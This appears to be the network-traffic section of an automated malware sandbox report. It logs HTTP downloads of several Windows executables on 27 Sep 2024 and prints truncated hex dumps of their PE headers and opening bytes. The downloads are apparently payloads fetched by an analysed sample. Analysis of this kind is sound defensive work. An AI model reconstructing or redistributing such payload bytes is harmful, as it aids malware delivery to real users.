00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:31 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:34 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:37 GMTContent-Type: application/octet-streamContent-Length: 986112Last-Modified: Tue, 24 Sep 2024 18:05:31 GMTConnection: keep-aliveETag: "66f2ff6b-f0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 01 0f 00 00 20 00 00 00 02 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 40 0f 00 00 06 00 00 00 04 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 21 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 50 d9 0e 00 d8 47 00 00 03 00 00 00 e7 00 00 06 94 55 00 00 bc 83 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 28 d4 00 00 06 2a 00 00 00 3e 03 02 28 18 00 00 0a 04 6f 56 00 00 06 26 2a 2e 73 0c 00 00 06 80 01 00 00 04 2a 1b 30 04 00 88 01 00 00 01 00 00 11 28 19 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 33 07 28 07 00 00 06 2d 03 16 6a 2a 7e 01 00 00 04 25 13 0b 28 1c 00 00 0a 7e 01 00 00 04 6f 0d 00 00 06 0c 08 16 6a 40 38 01 00 00 28 1d 00 00 0a 13 08 73 1e 00 00 0a 0b 11 08 6f 1f 00 00 0a 13 07 de 11 26 11 08 6f 20 00 00 0a 73 21 00 00 0a 13 07 de 00 11 07 6f 22 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f 23 00 00 0a 07 28 24 00 00 0a 11 07 6f 25 00 00 0a 6f 26 00 00 0a 6f 23 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 28 09 00 00 06 13 05 28 19 00 00 06 13 06 07 11 05 1e 63 d2 6f 27 00 00 0a 07 11 06 d2 6f 27 00 00 0a 07 11 05 1f 18 63 d2 6f 27 00 00 0a 07 11 06 1e 63 d2 6f 27 00 00 0a 07 11 05 d2 6f 27 00 00 0a 07 11 06 1f 18 63 d2 6f 27 00 00 0a 07 11 05 1f 10 63 d2 6f 27 00 00 0a 07 11 06 1f 10 63 d2 6f 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:40 GMTContent-Type: application/octet-streamContent-Length: 367616Last-Modified: Wed, 25 Sep 2024 17:02:23 GMTConnection: keep-aliveETag: "66f4421f-59c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 05 00 00 20 00 00 00 92 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 05 00 00 06 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 9e 05 00 e8 10 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 84 c5 64 0e 83 9a 4b be 0c f9 53 6b 0c ce 2b 47 ae 7f bf ee 51 8c ae fa 11 9d 1d 88 f7 af 95 1b ca 86 4a 19 6e 6a a4 49 d5 6b ad cb 29 f0 cd 45 26 45 89 38 5f de 62 b0 a3 de 24 10 17 b4 8c ff 09 ec d9 ee df 28 23 3f 6f 38 d0 0a c1 b5 0f 62 9d 39 b0 01 06 e9 7e 56 b5 34 83 99 76 31 d7 75 54 e1 30 da 86 1c 16 1d 5e 2e a0 d3 4c 62 81 a6 cb 0c 87 a8 c0 f8 3b d5 83 8f 0e 35 05 48 19 02 5e 84 31 8f 7c 3c c5 96 a5 60 79 35 34 a7 12 f2 66 e5 7e 0e ef 59 2c cc 53 2c 11 d1 57 70 f2 53 5b 36 83 86 dd 9c 9b 4e 6b fc 45 1e 08 5e d9 12 10 69 26 f8 a3 a4 bf fe 8d f7 10 3f 6f 6e 04 0a 8a 9f 7e 21 10 36 41 bb 01 d2 41 0e c5 96 ef 1d 4a 94 e4 8e 6e db d0 b3 78 0e 54 12 48 ea 61 92 d0 f0 9e b1 c9 ea d2 7a cc 17 08 63 d3 57 d3 85 1b 90 6e a2 67 23 75 a1 3e a3 41 91 da e7 84 36 4b 99 71 63 52 df 39 84 4c 89 da 3b 11 7a d2 73 3c eb ba df a1 92 6a f4 7c 1d 0e 9a 8c 92 0a bd 49 3a b2 77 e0 17 48 24 ed cc f3 90 7a 0f 5d 4d 48 8d 03 43 68 44 8f 79 d2 99 3e e
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 